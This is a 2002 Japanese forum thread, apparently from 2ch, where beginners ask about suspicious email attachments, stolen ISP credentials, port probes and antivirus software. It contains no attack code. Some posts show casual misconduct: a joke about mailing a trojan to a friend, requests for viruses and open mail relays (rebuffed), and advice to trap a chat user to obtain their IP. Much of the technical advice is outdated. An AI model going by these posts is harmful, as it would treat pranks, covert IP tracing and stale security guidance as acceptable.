ウイルスによって参照先が違うし、
アドレス帳だけとは限らん。

115 :名無しさん@お腹いっぱい。:02/01/17 19:56
New_Napster_Site.MP3.pif
これもウィルスですよね?


116 :アンチウイルス入れろヨ!:02/01/17 20:02
>>115
そんなこといったって…。
イタズラ添付ファイルかも知れんじゃないか。


117 :名無しさん@お腹いっぱい。:02/01/17 20:15
イタズラ添付ファイルって…

118 :名無しさん@お腹いっぱい。:02/01/17 20:18
イタズラ添付ファイルって何よ。

119 : :02/01/17 20:23
>117
ウィルスじゃないものを、誰かがウィルスっぽい名前にしてくっつけただけ、
という可能性も、ゼロじゃない。てことでしょう。

ウィルスかどうか確かめたかったら、名前だけでは解らない。
アンチウィルスでチェックするか、実行して感染するかを試すしかない

120 :名無しさん@お腹いっぱい。:02/01/17 20:59
昨晩、ウィルスかもしれないメールについて質問した69です。
遅レスですがレス下さった方々ありがとうございました。
メールは破棄しました。

121 :名無しさん@お腹いっぱい。:02/01/17 22:04
>>115
そんなイタズラされるような相手なら聞いてみればいいし
覚えがないならウィルスにしろいたずらにしろ迷惑なんだから
破棄することをお勧めする。

122 :名無しさん@お腹いっぱい。:02/01/17 22:29
>>115
君のとこに来たのがウィルスかどうか判断しかねるけど、
その名前のウィルスはあるよ。調べればすぐ出て来るはず。

123 :115:02/01/17 22:34
>>116
>>119
>>121
>>122
ありがとうございます。親しい知り合いから来たメールでもないので
メールが来た旨お知らせして破棄しようと思います。


124 :既出だったら誘導してっちょ:02/01/17 23:51
プロバイダーから11月分請求として約8万来ました。
どうも海外ローミング(ロシア)からの不正アクセスみたいです。
zoneAlarmとウイルスバスタ-で武装もどき していたのに
どこからidとpassが漏れたんでしょ?


125 :115:02/01/17 23:54
知り合いがウイルス感染。
性病みたいなもんだな。

126 :124:02/01/17 23:56
パソコン買い換えていないか? 買い換え時それまで使っていた
パソコンの処分は?

127 :名無しさん@お腹いっぱい。:02/01/18 00:18
>>123
お知らせしてもたぶん帰ってくると思うが…まぁそれも勉強のうち。

128 :既出だったら誘導してっちょ:02/01/18 00:38
>>126 換えてないです。
お金どうしよう・・・

129 :名無しさん@お腹いっぱい。:02/01/18 01:09
>>128=124
もしもIDとPASSが漏れたのが原因なら、他人が貴方のアカウントを
不正使用したのだからお金払う必要ないです。
プロバイダに言ってアカウントがどのルートで使用されたか
調査してもらったら?

130 :128:02/01/18 01:17
ロシアに渡航していない証明をして、払わない旨を通告する。
それで聞かないならここで晒し者にする。

131 :@nifty,ロシアからのローミングを停止 不正アクセス急増で:02/01/18 01:24
ニフティはこのほど,ロシアからのGRICローミングサービスを当面停止
すると発表した。ロシアから不正アクセスが相次いでいるためとしている。

ニフティによると,最近になってロシアからGRICローミングサービスの
利用量が急増。アクセスに利用されたIDを持つユーザーは国内にいたことが
確認されており,何らかの方法でIDとパスワードを盗まれて不正アクセスに
使われたと見られる。

ローミング停止はロシアのみだが,不正アクセス被害が拡大した場合は制限地域も
拡大するとしている。またロシアからのローミングが必要なユーザーは同社法務・
海外部で相談に応じる。

132 :131は2001年9月4日:02/01/18 01:25
http://www.zdnet.co.jp/news/bursts/0109/04/nifty.html

133 :おいおい:02/01/18 01:32
プロバイダによってはweb上で
不正使用されても金は頂くぞ ゴルァ!と歌っているところも有る
そういうとこでねぇの?

134 :名無しさん@お腹いっぱい。:02/01/18 01:33
いつもダイヤルアップで接続しています。
OEでメール送信する時、最近ダイアログをみると送信時に
書いたメールの数より1通余計に送ってる表示になるのですが、
送信記録には残っていません。
一応ウイルスバスターは入れていて、検索しても何も出ませんが、
なんか気になります。
OEかサーバーがおかしいのかも知れませんが、どこかの他人に
自分の情報が送られてるような気がして気持ち悪いです。

135 :おいおい:02/01/18 01:34
アカウント情報の管理・セキュリティ対策は厳重に

アカウント盗用に関して弊社に重大な落ち度がない限り、
弊社がその責任を負うことはありません。アカウントが盗用され不正利用された場合のご利用料金は、お客様のご負担となります


136 :名無しさん@お腹いっぱい。:02/01/18 01:34
そもそも海外ローミングって、事前に地域指定して申し込まないと
使えないものだと思ってたが…違うのかな??

-------http://www.wakwak.com/world/faq.htmlより
※ ID盗用による不正アクセスが頻発しているため、
2001年11月30日より当分の間、以下の地域のアクセス
ポイントを閉鎖することになりました。閉鎖後は、
対象地域内のアクセスポイントはご利用いただけません
ので御了承下さい。お客様には御迷惑をおかけいたしますが、
被害を未然に防ぐための措置ですので何卒御理解いただきます
ようお願いいたします。
【対象地域:ロシア・カザフスタン・ウズベキスタン各国の全域、
およびウクライナの一部地域】


137 :おいおい:02/01/18 01:36
地域指定していなくても、手続きしていなくても
海外ローミング可能なプロバも有るよ


138 :名無しさん@お腹いっぱい。:02/01/18 01:38
>>135のはどこのISPの文書?

139 :おいおい:02/01/18 01:56
ねたです。

140 :h:02/01/18 03:59
Nortonとウィルスバスターって共存できますか?
ファイアーウォールの部分。

141 :140:02/01/18 04:02
2002です。

142 : :02/01/18 05:31
友達がノートンアンチウィルスの割れ堂々とインストールしてつかってるけど
割れつかってタイーホされた人ってあんまりきかんけど、そこらへんは、どうなん??
MXでアップしたやつは、問題になってるけど。。。ツレつかまるんか??


143 :名無しさん@お腹いっぱい。:02/01/18 06:11
捕まる

(怒らせれば)


(今は面倒臭いな〜とか思ってるけど・・・。)

144 : :02/01/18 06:27
>>143
相手を怒らせる基準は???

145 :至急!:02/01/18 09:41
Sokets de Trois v1.
に感染している(?)みたいですどうやって駆除すればよいですか?
(Norton Utilities 2001
は、あります。それをつかってなにかできるんでしょうか?)

146 :名無しさん@お腹いっぱい。:02/01/18 11:48
>>145
ウィルス対策ソフト買え。

147 :質問です。:02/01/18 12:40
win9xを利用してますが、タスクスケジュールでwalign.exeを起動しようとしてます。
これってウィルスじゃないですよね?
walign.exeの実体はc:windows\systemのフォルダにあります。

148 :col:02/01/18 12:46
>>142
逮捕されなきゃ何してもいいわけ?
明らかに違法行為です。訴えられれば捕まりますよ。


149 : :02/01/18 12:47
>147
アンチウィルスでチェックしたか?

150 :名無しさん@お腹いっぱい。:02/01/18 12:49
http://www.symantec.com/region/jp/sarcj/vinfodb.html
>>147
検索したところ、違うらしい。
今度から自分でやれ。

151 :col:02/01/18 12:52
>>147
Windows98の「アプリケーションの起動チューンアップ」を利用していませんか?
アプリケーションの起動を早くするためのものなのです。
問題ありません。

152 : :02/01/18 13:00
>147
人に聞くより先に、検索するなり、アンチウィルスソフトで調べるなりして、
自分で確かめる事をしなければ、ずっと「これは大丈夫?「あれは大丈夫?」
と人に聞き続ける「教えて君」になってしまいますよ

153 :第三者中継可能?:02/01/18 16:40
Received: from rcpt-expgw.biglobe.ne.jp (210.147.6.213) by abuse@optin-global.com with SMTP; ***
Received: from smtp-gw.biglobe.ne.jp by rcpt-expgw.biglobe.ne.jp (8.9.3+3.2W/3.7W) with ESMTP id MANKO_931!!! for <abuse@optin-global.com>; Moon, 32 USA 3001 25:61:70 +2500
From: ki-midori@mve.biglobe.ne.jp
Date:Moon, 32 USA 3001 25:61:70 +2500
X-Biglobe-Sender:< ki-midori@mve.biglobe.ne.jp >
Received: from MUSASHI88 (211.18.239.190 [211.18.239.190]) by smtp-gw.biglobe.ne.jp id PUSSYJENNA;Moon, 32 USA 3001 25:61:70 +2500
Message-ID: <bijlogyiokcty78645jiog@MUSASHI88>
To: <abuse@optin-global.com>
Subject: SE45-75万 PG40-50 PCサポート2 0-45待機時支給 社保有
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-2022-jp"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

154 : :02/01/18 16:41
  

155 :名無しさん@お腹いっぱい。:02/01/18 18:34
ウィルスってどんな感じですか?
やばめなのを送ってもらえますか?
いっこPCぶっこわしてもいいんで。
hiro-h@yo.rim.or.jp

156 :名無しさん@お腹いっぱい。:02/01/18 18:35
>>155
攻撃依頼か? すっこんでろ。

157 :名無しさん@お腹いっぱい。:02/01/18 20:01
今現在ノートンアンチウイルスの
ライブアップデートは
ユーザー全員が更新出来ない状態が続いているの?
自分は出来ないんですけど、、。

158 :ゴッチ:02/01/18 20:08
ゴッチです。
おいらもsendmailのこと知りたい。
メールくれ。


159 :添付ファイル:02/01/18 20:51
友人からのメールに「attach.dat」というファイルが
付いてきました。これはなんのファイルなのでしょうか?
開いても大丈夫でしょうか?怖いのでまだ開けていません。

どなたか教えていただけませんか。よろしくお願いします。

160 :名無しさん@お腹いっぱい。:02/01/18 21:08
>>159
あなたは友人からのメールに添付ファイルが付いているたびに
ここへ質問しに来る気ですか?

161 :名無しさん@お腹いっぱい。:02/01/18 21:15
>159
あなたみたいな人が、いちいち何か添付ファイルが
ついていても心配しないでいいようにということで
開発されたソフトが何本も市場をにぎわせています。

ウイルス対策ソフト買いましょう。

162 :鮫肌:02/01/18 21:31
>>157
>>158
まとめて落とせば?
http://www.symantec.com/region/jp/sarcj/download.html

>>161
初心者(プッ
batファイルはウイルスじゃなかったとしても、ダブルクリックしただけでハードディスクがフォーマットされたりする危険な代物。そうだ、ノートンで検出できないbatファイルでウイルス扱いされているものが幾つあるのか、知ってるのか(プッ
自分のスキルの低さを棚に上げて馬鹿晒している奴を久々に見た(プッ

163 :名無しさん@お腹いっぱい。:02/01/18 21:34
>>159
「それは安全、開いても大丈夫だよ」と言ったら開けるのか?

つーかそれ、OE使ってるなら添付ファイル名を知った時点で
普通は開けてしまってるような気がするんだが…。
プロパティからヘッダ情報見るなんてことしないだろ?どーせ。


164 :通りがかりの(゜▼゜*:02/01/18 21:45
>>162
batファイルかも知れないよ、という意味ですか?
それともdatファイルとbatファイルをかけてるんですか?

165 :墓守:02/01/18 21:45
>>163
MS01-020のパッチを導入すればいいだけの話。

166 :163:02/01/18 21:49
>>165
そりゃそうだが、パッチ導入してる人が
>>159 のような質問すると思うか?

167 :名無しさん@お腹いっぱい。:02/01/18 21:53
>162
人を笑ってはまる穴あり、だな。痛すぎ。

168 :墓守:02/01/18 21:55
>>166
パッチ導入ね。今はIE5.5SP2やIE6に入っているようだけど。

言いたいことはわかるけど、教える側の問題なのか、教わる側の問題なのかは微妙ですね。EXEじゃなければ大丈夫なんて迷信の中で、comやregやbatの危険性なんて、誰も言わないし。リテラシーとしての最低限の知識がみんな欠如しているんだろうね。

169 :墓守:02/01/18 21:58
>>167
batは確かに危険だよ。ノートンでもVBでも検出できない危険ファイルが作りたい放題。

170 :通りがかりの(゜▼゜*:02/01/18 22:07
>>168
んにゃ、違うでしょう。
>EXEじゃなければ大丈夫なんて迷信
こんなの誰が信じてますか?

>comやregやbatの危険性
誰も言わないのは、当たり前だからじゃないですか?

>>169
batならね。それは危険。

171 :名無しさん@お腹いっぱい。:02/01/18 22:08
ノートンでスキャンしたら、WINDOWS\SYSTEM\MSJSTICK.DRVと、
WINDOWS\SYSBCKUP\MSJSTICK.DRV、というものが、予防接種変更済みと
出てきました。再予防接種も、修復も削除もできませんでした。
SYSTEMのほうのファイルだけ見つけることが出来たのですが、
ウィルスアイコンになっており、ウィルスに感染していますと表示
されていました。手動で削除して、再びスキャンしてみると復活します
何度やっても同じです。どうやって削除したらよろしいでしょうか?
どなたか、よろしくお願いします。

172 :名無しさん@お腹いっぱい。:02/01/18 22:13
>>171
Win98なのかWinMeなのか、書かないと…。

173 :墓守:02/01/18 22:17
>>170
これが案外、基礎知識として浸透していないんだよね。今月になってからどこからか拾ってきたbatを実行した人が何人かいたよ。それにcomが実行ファイルだと知らない人はかなり多いかと。

ところでregedit.exeをregedit.comにリネームして実行すると、ちゃんと機能するんだよね。エクステンションなんて、案外アバウトなものなのかもしれない。

174 :名無しさん@お腹いっぱい。:02/01/18 22:18
初心者ですみませんm(_ _)m

>>162>>168>>173のような書き込みは適切な個所で改行されておらず
非常に読みにくいのですが、これらはどういった目的なのでしょうか?

私のような素人相手にはこういった返事のしかたをするのが
ここでのルールなのでしょうか(^^;

175 :名無しさん@お腹いっぱい。:02/01/18 22:19
やめれ

176 :墓守:02/01/18 22:21
>>174
Iモード?

177 :171:02/01/18 22:25
>>172すみません。WIN98です

178 :うぇ:02/01/18 22:29
>160.161.163
このスレは1が“セキュリティ関係で、どこに質問したら良いかわからない人は
こちらにどうぞ。”と立てたスレなんだから、159の質問は適切なのではないか?
ばかばかしいと思うんなら他へ逝け。スレの主旨を考えろ。

>159
答えてやりたいが、わたしものぞきに来ている初心者なのでワカラン。
でもだれかきちんと答えてくれるひとがいるんじゃないかな(期待)。

179 :墓守:02/01/18 22:33
さきほど他のスレッドで指摘を受けました。自分自身、気づかないうちにかなり生意気な書き込みをしてしまっていたようです。本当に申し訳ありませんでした。これから精進いたしますので、皆様どうかお許しください。

180 :名無しさん@お腹いっぱい。:02/01/18 22:34
>159
その友人って、Mac使ってない?
だとしたら、べつにどってことないけどね。
拡張子datっていうファイルは、普通のアプリケーションでは
直接的に利用されるファイルではないから
大丈夫だとは思うけど、まぁ、ながめる必要のない
ファイルだと思うよ。

batのはなししている奴ら、混乱の元なのでやめれ

181 :名無しさん@お腹いっぱい。:02/01/18 22:38
はげどう
他スレでも暴れてる墓守はウザイ
大した事言ってないし

182 :通りがかりの(゜▼゜*:02/01/18 22:40
ええと…いちおう説明すると、batについて突っ込んでるのは
>>159 >>161 >>162 >>164 と読んでもらえばわかると思うが、

162さんが161さんを初心者と言ってるのは、2通りの解釈があるな?と思った次第で、

1.159さんのような質問する人だから、当然すべての拡張子表示の設定にしてない
  だからそれはbatファイルかも知れないよ。

2.実は attach.dat の dat と bat をカケた新種のギャグですよ。

で、どっちなのかな?と…。
1の場合にしても人の環境まで深読みできなかっただけで、
「初心者、スキルの低さ、馬鹿晒している」と罵倒される場所なのかな?と…。

まぁそんなことを、素朴に疑問を感じたわけでございますよ。。。

183 :名無しさん@お腹いっぱい。:02/01/18 22:42
いいからやめれ

184 :墓守:02/01/18 22:43
>>180
マックならbatもdatも関係ないよね。
止めろというなら止めるけどね。
確かに179と191に混乱を招いているようだし(笑

で、179と191は誰?名無し煽りご苦労様です。

185 :171:02/01/18 22:43
私は質問ここで良かったのでしょうか?

186 :通りがかりの(゜▼゜*:02/01/18 22:44
>>182 の 1は二重拡張子のことです。念の為。

187 :つりがね饅頭好き:02/01/18 22:46
で、結局は拡張子.datはなんなんだよ!わかんねージャン!

188 :名無しさん@お腹いっぱい。:02/01/18 22:47
もうやめれ

189 :通りがかりの(゜▼゜*:02/01/18 22:48
>>188
何をやめるのですか?

190 :墓守:02/01/18 22:49
>>185
いいんじゃないの?
もし嫌じゃなかったら、実物送って。
こっちのメアドはWebメールだから、匿名串さしてyahooでもlycosでも好きなところから送れば、あなたのIPアドレス等はわかりませんから、お気兼ねなく。週末に解析してみます。

191 :名無しさん@お腹いっぱい。:02/01/18 22:50
わたしがなにか?

192 :名無しさん@お腹いっぱい。:02/01/18 22:52
>>185
もうちょっと待ちなさい。今はネタスレ化してるから。
きちんとした知識をもった人がきっと答えてくれるさ。
待てないならGoogleで検索でもしてちょ。

193 :名無しさん@お腹いっぱい。:02/01/18 22:52
>>190
ありがとうございます。そのまま添付して送れば良いでしょうか?

194 :墓守:02/01/18 22:52
>>187
データファイル。

195 :墓守:02/01/18 22:52
>>193
どうぞ。

196 :通りがかりの(゜▼゜*:02/01/18 22:54
仮に>>182の1のような場合も考えれば、
見た目がdatファイルなだけで本当の拡張子は
exeでもcomでもpifでもbatでもなんでもアリでしょう?
拡張子datが何か?なんて考えても無駄ですよ。

197 :名無しさん@お腹いっぱい。:02/01/18 22:55
ttp://www.geocities.com/ccsacla/images0012.jpg
これ踏んでしまったんですが、どうなるんでしょうか?

198 :墓守:02/01/18 22:56
>>196
ファイルのプロパティを見れば、二重拡張子は判別できると思うけど。

199 :名無しさん@お腹いっぱい。:02/01/18 22:57
わしょーい

200 :ちょっといいかな:02/01/18 22:58
それは>>196さんがそう想定しているだけのことでは?
たずねていることを教えてあげるのと、それだとはかぎらないよって
つけ足してやればいいのではないでしょうか

201 :200デス:02/01/18 23:00
>>200の「それ」は>>196のレスを指してマス

202 :通りがかりの(゜▼゜*:02/01/18 23:06
>>200
その通りなんですが、根本的に考えると
その元記事さんの友人さんに聞くよりないと思うんですよ。
友人が出した覚えがないなら、それはウイルスの可能性があるし。
友人が出した覚えがあるなら、そこから後は信用の問題ですしね。

203 :ジョセフ:02/01/18 23:10
アヴドゥル…
いよいよWindowsをインストールするわけじゃが

その……ちょいと心配なんじゃ……
いや…『インストール手順』のことはもちろんだが
わしは実はWindowsというOSは初めてなんだ

WindowsというOSは強制終了とかシステムクラッシュばかりして
セキュリティホールばかりあって
ウイルスなんかにすぐにでも感染しそうなイメージがある

204 :アヴドゥル:02/01/18 23:10
>>203
それはゆがんだ情報です
心配ないです
みんな…素朴なプログラムのいいOSです

205 :名無しさん@お腹いっぱい。:02/01/18 23:11
このプログラムは不正な処理を行ったので強制終了されます

Explorer[応答無し]

例外OEがアドレス0028:C00313B8で発生しました
現在のアプリケーケーションを終了します

206 :ジョセフ:02/01/18 23:11
ア…アヴドゥル
これがWindowsか?

207 :おいおい:02/01/18 23:11
本当はネタではないんだけど、有らぬ方向に話が広がりそうなのでネタ扱いにしておいてください。

208 :アヴドゥル:02/01/18 23:11

いいOSでしょう

これだからいいんですよ
これが!

209 :名無しさん@お腹いっぱい。:02/01/18 23:12
ワショーイ

210 :通りがかりの(゜▼゜*:02/01/18 23:14
>>198
いえ、ずっと読んでいただいたらわかると思うんですが…。
それは元の>>159さんに教えてあげるべきことですね。

そうすると、友人から添付ファイル付きメールがきたら
「これは何?」と訊く人に対して、メールヘッダの見方から
拡張子表示の設定から二重拡張子の意味まで、
色々教えてあげる必要が出てくるわけですが・・。

211 :墓守:02/01/18 23:19
>>210
言いたい事が、やっと伝わりました。ごめんね。
そこまでは対応できませんね。

私は添付ファイルを送るときには、本文中にファイル名とサイズをそれぞれ記入しています。これが一番確実な対処法なのかもしれません。

212 :ちたん:02/01/18 23:21
まあ、attach.datをバイナリエディタで開いて見れば正体がわかるんじゃないの?

213 :ちたん:02/01/18 23:24
つーかさ、送った側が何も説明していない添付ファイルなんて99%怪しいじゃん
相手から何か説明があったんなら>>159みたいな質問はしないだろ

214 :名無しさん@お腹いっぱい。:02/01/18 23:26


215 :墓守:02/01/18 23:33
>>212
メモ帳で開いても、一般の人はわかりませんよね。
添付ファイルを送るときには一言書けばいいのに、なんてよく思います。
特に、メールを送った後に添付ファイルを本文無しで送りつける人、ブルブルです。

216 :通りがかりの(゜▼゜*:02/01/18 23:36
>>211
わかってもらえて嬉しいです。まー結局誰からのメールにしても
説明のない添付ファイル付きのはALL削除ですね。

>>159さん、ここまでの情報を見て適当に出来ることをやってみてください。
OEを使用していて、拡張子表示の設定を標準のままで、セキュリティパッチを
当てていない場合、貴方は既に何らかの実行ファイルを開いてしまってる可能性
があります。よくわからなければ削除して、様子を見るべきです。

217 :墓守:02/01/18 23:44
>>216
常識の問題ですよね。実行ファイルを送りつけられて削除した直後、「さっき送ったゲームいいでしょ」、なんてメールを受け取ってウツ。

218 :名無しさん@お腹いっぱい。:02/01/18 23:47
ていうか、OEなんか使ってるから困っちゃうんだよ(笑)

219 :名無しさん@お腹いっぱい。:02/01/18 23:50
>>217
そ、それ、漏れの友達に見つけたばかりのトロイ鯖添付で送った後に
使った手だ。。。。

220 :墓守:02/01/18 23:52
>>218
htmlメールの作成には便利なんですけどね。
受信はさっぱりです。
>219
こらこら。

221 :通りがかりの(゜▼゜*:02/01/18 23:55
OEって言ったら、
OE6からウイルス防御機能とかいうのが付いたらしいけど…。
何かと思ったら普通のメーラーなら当たり前のことを
もっともらしく防御機能って読んでるだけのような…。

222 :名無しさん@お腹いっぱい。:02/01/18 23:56
Jupiter使ってますが何か?

223 :墓守:02/01/19 00:02
>>221
添付ファイルがexeだったら警告するくらいのこと。寒いよね。
メーラーの機能以前に、OEのセキュリティを制限サイトに設定して、ローカルからのファイル移動等を制限しないユーザーが多いのが問題。

普通の人は、知らないんでしょうね。

224 :通りがかりの(゜▼゜*:02/01/19 00:10
>>223
デフォルトでそうなってないのが問題ですね。
HTML形式もしかり。

う〜ん、よく考えたらここ質問スレだし、
雑談組はそろそろ退散するとしましょうか。。。

225 : :02/01/19 00:10


226 :ちたん:02/01/19 00:21
>普通の人は、知らないんでしょうね。

って、
おーまえは特別なのか?

と言いたい!!

227 :名無しさん@お腹いっぱい。:02/01/19 00:27


228 :名無しさん@お腹いっぱい。:02/01/19 00:47
なんかやたら同じ相手がポートチェックかけてくるんですが
これは相手は自動でソフトなんか使ってやってるんですかね?
それとも手動??
あとこっちには一応FWがあるのでそんなんやっても無意味って
知らせる方法はないですか?

229 :名無しさん@お腹いっぱい。:02/01/19 00:55
>>228
そういう主張をすると相手が別の手段を取るようになるかも

230 :(゜▼゜*):02/01/19 01:05
>>228
ポートチェックって、具体的にはどんなんですか?
どれぐらいの間隔で仕掛けてくるんでしょ?

231 :228:02/01/19 01:12
>>229
なるほど。
>>230
BlackIce入れたんですが、Port Probeというのが今日夕方黒氷導入してから
十回くらいあります。数分の間に五回あってあきらめたかなーと思ったら
またしてきたり。
こういう場合私のIP?というか私を標的にしたきっかけはなんなんでしょう?
攻撃者のことはなにもわからん

232 :(゜▼゜*):02/01/19 01:18
>>231
同じポートばかりですか?プロトコルとポートはなんでしょう?

233 :228:02/01/19 01:25
>>232
うーんわかんないです。
とりあえずBlackIceがいいってんで使ってる厨房なんで。

234 :(゜▼゜*):02/01/19 01:29
>>233
そういうことなら、放置しとくか遮断するかしかないですね。
誤検知だった場合、遮断するとそのサイトにはアクセスできなくなりますが。
そこのIPアドレスを
http://www.mse.co.jp/ip_domain/ などで調べて、必要なサーバーかどうか
調べてみては?

235 :233:02/01/19 01:40
>>234
ありがとう親切な通りすがりさん

236 :リー:02/01/19 05:08
私、日本のドメインいっぱい攻撃しよおもてるね。
まずは、sendmailでリレできるとこさがしてるある。
でもみつからないあるね。
おしえてあるね。


237 :名無しさん@お腹いっぱい。:02/01/19 05:09
>>236
逝ってヨシ

238 : :02/01/19 05:17


239 :名無しさん@お腹いっぱい。:02/01/19 05:28
今日、変なメールが届きました。
>>あなたは、不正にウィルスを他人に送ってますね。
>>こんなもの送るなんて、人間失格やね。
>>また送ってきたら、あんたの所荒らすから♪
>>サーバーから経由串や所在地まで把握しといたから。
>>ネットにばら撒こうかな〜
というものです。全く身に覚えがありません。
私が使ってる他のアカウントにも同内容のメールが届きました。
すごく気味が悪いのですが、こういうこともできるのですか?
IP見たら某大学からだったようなのですが、
何か手を打った方がいいでしょうか?
ちなみにこのメールが来る前に一つDOHFDKDO.exeという
ウィルスメールが届いてました。こちらのメールはOCNで
その大学と同じ市でした。

240 :名無しさん@お腹いっぱい。:02/01/19 06:00
>>239
大学にメールを送って注意喚起してもいいけど、
「DQN学生のくせして訳の分からんメールで人を脅すな、ヴォケ」
って逆に脅してもいいかも(嘘

同じ市だからといって同一人物だとか余計な詮索なんてしないで、
とっとと捨てて忘れなさい。くどかったら、禁止リストに入れなさい。

241 :239:02/01/19 06:08
240さん、レスありがとうございます。
無視して忘れた方がいいですよね。
でも、これでどこまで情報が漏れているか不安なんです。
メール盗み見されたりしますか?
アカウントとパス変えたほうがいいですかね?

242 :名無しさん@お腹いっぱい。:02/01/19 06:22
こちらに始めて質問します。
先日から、某チャットに、常連さんの偽者が出没するんですが、
どうやったらIPアドレスを取得できるでしょうか?
よろしくお願いします。


243 :名無しさん@お腹いっぱい。:02/01/19 06:24
>>241
何の情報が漏れると困るのか分からん以上は何とも言えんが、
その人(だけ)にメールの盗み見されるのを危惧しているんならアカ変えれば?

ただ、アカを変えたらメールの盗み見が無くなるって
わけでもないので悪しからず。

244 :名無しさん@お腹いっぱい。:02/01/19 06:28
>>242
方法は腐るほどあるので与えられた情報がそれだけでは何とも言えません。

245 :239:02/01/19 06:52
>>243さん
情報漏れて困るのはメールと、ファイルも見られては困る物もあります。
今盗み見されてるのであればアカ変えて・・・、
他にやったほうがいい事はありますか?
友人の話によると、踏み台にされていて、
その人にウィルスメールを送ってしまったんではないかとも言ってました。

246 :242:02/01/19 07:10
>>244
あとは、どのような情報が必要でしょうか?

247 :名無しさん@お腹いっぱい。:02/01/19 07:38
>>245
ほかにやった方がいいこと
・「ハッカー」と「バッカー」の違いが分かるまで
たくさんのHPをまわって知識を得る。

>>246
少なくとも、
OS、チャットに使うアプリ等の自分の持っている環境。
自分の立場等の対外的な環境。

248 :名無しさん@お腹いっぱい。:02/01/19 08:06
>>246
使用しているメールクライアントはローカルなものか? hotmailなどのwebmailか?
アンチウィルスのインストールの有無。 他に不審なメールが来てないか?

>>242
チャットの設置人に聞く。
罠に誘導する。


249 : :02/01/19 15:12
>239
http://pc.2ch.net/test/read.cgi/hack/1011235597/n71
これとは別物?

250 :名無しさん@お腹いっぱい。:02/01/19 16:30
ところでメールを介して感染するウイルスの類は
Outlook以外のメールソフト(Webメールや他のメールソフト)
使ってたら安全なの


251 :名無しさん@お腹いっぱい。:02/01/19 16:51
>>250
お前次第だろ、としか言えんぞ。

252 :250:02/01/19 17:13
添付ファイルは気になってバイナリエディタで覗いてしまうんだが
これはやばくないと思っている俺はどうだろうか?

253 :名無しさん@お腹いっぱい。:02/01/19 17:17
特定の人からのメールを受け取り拒否にしたいのですが、
アウトルックでは可能ですか?

もしそういう設定に便利なソフトがあったら教えて下さい。

254 : :02/01/19 17:24
>>252
対策ソフトを持っていないおまえはヤバい


255 :250:02/01/19 17:35
対策ソフトを持っていても面倒くさくて入れてない俺はやばい

256 :名無しさん@お腹いっぱい。:02/01/19 17:53
>>252
そんなもん別にやばくない

257 :名無しさん@お腹いっぱい。:02/01/19 19:55
age

258 :  :02/01/19 19:55
WORLD-NETというとこから不正アクセスがあったんだけど、、
WORLD-NETてどんなとこ?

259 :墓守:02/01/19 20:28
>>258
http://www.mse.co.jp/ip_domain/index.shtml

260 :名無しさん@お腹いっぱい。:02/01/20 06:14
どうも、厨房です。
ファイヤーウオールって二重三重四重にかけて意味あるんでしょうか?


261 :名無しさん@お腹いっぱい。:02/01/20 08:31
>>260
同じソフトなら通信速度が遅くなるだけだと思います。
違うソフトやシステムだった場合は、それに依存した部分での
弱点が補強されるカモ知れないと思います。

私も厨房なので、結局思うだけなのですが。

262 :名無しさん@お腹いっぱい。:02/01/20 11:25
回線切って2度と繋がない。これ最強。
つか、四重って…(w

263 :名無しさん@お腹いっぱい。:02/01/20 12:57
>>253
とりあえず、メッセージルールを指定してゴミ箱直行にすれば?


264 :名無しさん@腹いっぱい:02/01/20 13:23
attach1(187b)という名の添付ファイルが送信されてきたんですけど知ってる人いますか?
送り主が不明で件名が文字化けしているので何が何やら。
心当たりは出会い系サイトでメールを送信したことくらいしかありません。
誰か御教授お願い致します。

265 :名無しさん@お腹いっぱい。:02/01/20 13:37
前にも同じような質問があったけど変なホームぺ−ジを踏んでいらいウィンドウの
大きさを調節するところがおかしくなりました。どうしたらもとどうりなりますか
お願いします。

266 :名無しさん@お腹いっぱい。:02/01/20 14:02
>>265
セーフモードで再起動

267 :墓守:02/01/20 14:02
>>265
再起動すると治りますよ。
http://homepage2.nifty.com/winfaq/fontstrouble.html

268 :墓守:02/01/20 14:04
>>266
ケコーンする?

269 :名無しさん@お腹いっぱい。:02/01/20 14:13
ネットゲームでポートを開けたいんですけど
プロバイダのサポートじゃ推奨以外の設定は教えて
くれないし、ルーターの説明書も専門用語ばっかしでわかんないです。
難しいんでポートの設定をあきらめて
動作モードをNATルーターからブリッジにしたらポートは全部開くんですか?


270 :名無しさん@お腹いっぱい。:02/01/20 14:18
セーフモードってなに?

271 : :02/01/20 14:51
>>270
使っているコンピュータのマニュアルとかにあるはずだけどね。
下記のところで、サイト内検索で「セーフモード」としてみ。
http://homepage2.nifty.com/winfaq/

272 :名無しさん@お腹いっぱい。:02/01/20 14:51
>>270
Windowsの起動に必要な最小限のファイルだけを読み込んで起動するモード

質問いいですか?netstat -snって何でしょうか?netstat -anやろうとして
間違えて入力してしまったんですが、なんか色々表示されたので・・。
検索しても日本語のページは2件しか引っかからないんですが。

273 : :02/01/20 14:55
>>272
-snとかつけて検索したの?
netstatだけなら沢山ひっかかったけどね。
中には書式を書いているのもあると思うよ。

http://www.google.com/search?q=netstat&hl=ja&btnG=Google+%8C%9F%8D%F5&lr=lang_ja


274 : :02/01/20 15:00
>>269
テレビ電話の例ではブリッジモードでOKらしい。
http://dekiru.goo.ne.jp/200202/special/02_2.html

ポートが開いているかどうか知りたい場合には
Shields UP !
https://grc.com/x/ne.dll?bh0bkyd2
を見るのが常道なんだけど。

275 :272:02/01/20 15:05
>>273
どうもありがとう。-snというか -sなんですね。
プロトコルごとの統計情報が表示されると書いてあったス・・。
イマイチわかりませんが・・(藁 ありがとでした!

276 :名無しさん@お腹いっぱい。:02/01/20 15:09
>>266
>>267
レスありがとうございます。
おかげで直りました。

277 :助けて〜:02/01/20 15:10
青い顔が出る オバケか?
どうすりゃいいの?
まじで怖い・・・誰か知りませんか?

278 :断る:02/01/20 15:13
>>277
そんな情報でどうやって助けろってんだ?アフォ

279 :助けて〜:02/01/20 15:14
助けてくれよぉ〜

280 :断る:02/01/20 15:17
>>279
とりあえず部屋の窓開けろ。話はそれからだ。

281 :助けて〜:02/01/20 15:20
開けたよぉー

282 :初心者:02/01/20 15:22
怪奇画像(怖い女)が一定感覚で現れる症状
http://pc.2ch.net/test/read.cgi/hack/1011083919/

283 :助けて〜:02/01/20 15:26
窓を開けてどうすりゃいいんだい?

284 :名無しさん@お腹いっぱい。:02/01/20 15:30
これですね
http://www.geocities.co.jp/SiliconValley-Cupertino/9822/

285 :断る:02/01/20 15:30
>>281
                        
